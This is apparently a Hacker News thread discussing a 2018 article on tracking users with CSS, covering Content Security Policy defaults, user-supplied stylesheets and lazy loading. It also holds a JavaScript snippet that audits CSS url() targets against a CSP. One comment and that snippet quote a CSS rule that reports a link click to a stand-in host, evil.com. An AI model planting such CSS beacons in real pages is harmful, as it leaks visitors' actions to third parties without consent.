Tracking Users with CSS (2018)

templarbit.com

63 points by zinssmeister 7 years ago · 17 comments

saagarjha 7 years ago

This article seems to have a threat model where a website is “compromised” into sending user data to a third party, but I don’t really see anything that protects users from a website whose owner actively wants to track them. This is an odd threat model to have.

Also, as an aside:

> For example, by detecting whether the browser supports the Calibri font family, we can assume that the browser is running in Windows

I’m pretty sure that Safari has stopped allowing the use of third party fonts for exactly this reason, and now reports a standard set of fonts as being available.

  • javajosh 7 years ago

    You can't assume that only the origin will be serving CSS. Most pages these days contain resources from all over the web, and most developers assume that CSS is safe to load from anywhere. What's not clear to me is whether 'evil' in content: url("https://evil.com/track?action=link_clicked") can point to anywhere on the web? Or just the origin of the CSS? Or...?

    • IggleSniggle 7 years ago

      Depends on the Content Security Policy of the site.

      • javajosh 7 years ago

        Yes, of course - but what is the default if you don't have a CSP? I guess I will have to do the experiment.

        • IggleSniggle 7 years ago

          Apologies, wasn't trying to be snarky. If you are configured to allow resources to load from anywhere, the CSS can load a resource from anywhere, not just the location it originated from. These kinds of configurations are increasingly less the default, however, so depending on your specific setup, you may find that some origin policies are in place by default. This is entirely dependent on your chain, however, including browser settings.
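
The question in this sub-thread (where may a CSS `url()` point, with and without a Content Security Policy) can be checked mechanically. The sketch below is an added example, not code from the thread or the linked article: a simplified matcher for the `img-src` / `default-src` directives that ignores ports, paths, nonces and hashes; the function names and the page origin `https://example.org` are assumptions.

```javascript
// Added example: simplified CSP check for image loads triggered by CSS url().
// Covers 'none', 'self', *, scheme sources (https:) and host sources with an
// optional scheme and leading "*." wildcard. Ports and paths are ignored.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !(name.toLowerCase() in policy)) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'self'") return url.origin === pageOrigin;
  if (s === "*") return url.protocol === "https:" || url.protocol === "http:";
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)$/.exec(s);
  if (!m) return false; // 'none', nonces, hashes: never match a url() load
  if (m[1] && url.protocol !== m[1] + ":") return false;
  return m[2] ? url.hostname.endsWith("." + m[3]) : url.hostname === m[3];
}

// True if a browser enforcing cspHeader would fetch the image at target.
function imageLoadAllowed(cspHeader, target, pageOrigin) {
  if (!cspHeader) return true; // no CSP: any origin may be fetched
  const policy = parseCsp(cspHeader);
  const sources = policy["img-src"] ?? policy["default-src"];
  if (sources === undefined) return true; // policy does not restrict images
  const url = new URL(target, pageOrigin); // resolves relative url() values
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

// Collect url(...) targets from a stylesheet for auditing.
function cssUrlTargets(css) {
  return [...css.matchAll(/url\(\s*["']?([^"')]+)["']?\s*\)/g)].map((m) => m[1]);
}

// Constructed sample rule using the URL quoted in the comment above.
const sampleCss = '#link:active::after { content: url("https://evil.com/track?action=link_clicked"); }';
const page = "https://example.org"; // assumed page origin
for (const csp of ["", "default-src 'self'", "img-src *"]) {
  for (const t of cssUrlTargets(sampleCss))
    console.log(JSON.stringify(csp), t, imageLoadAllowed(csp, t, page) ? "allowed" : "blocked");
}
```
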

  • wongarsu 7 years ago

    There are multiple sites that allow users to set custom CSS. Consider for example subreddit styles on reddit or the customisation of Tumblr pages.

    One big selling point for CSS was to separate layout and content exactly to allow other people to write CSS.

  • rebuilder 7 years ago

    It's the threat model that the customers they're trying to bring in would care about.

Tepix 7 years ago

I like the idea of loading all linked content at page load time.

  • DaiPlusPlus 7 years ago

    That’s bad for mobile - especially if a website has really large images for high-DPI devices. I think you can configure some mobile browsers to always download low-DPI assets to save on bandwidth.

    • Tepix 7 years ago

      You could make it optional. Right now there's almost nothing you can do when you visit a site even if you know it uses this technique.

  • AnaniasAnanas 7 years ago

    By linked I hope that you mean things like images and CSS style-sheets rather than actual <a> links. If so, I totally agree with you, this kind of lazy loading that CSS utilises is a true privacy nightmare.

jwilk 7 years ago

Previous discussion:

https://news.ycombinator.com/item?id=16157773

fawelo123 7 years ago

AFAIK doesn't work on Firefox.

  • fawelo123 7 years ago

    And if you are using anything but Firefox you shouldn't worry about your browser history anyway. Due to fingerprinting you give all of your browsing history to Google regardless.

interfixus 7 years ago

CSS is fundamentally breaching the contract by messing in any way whatsoever with content.
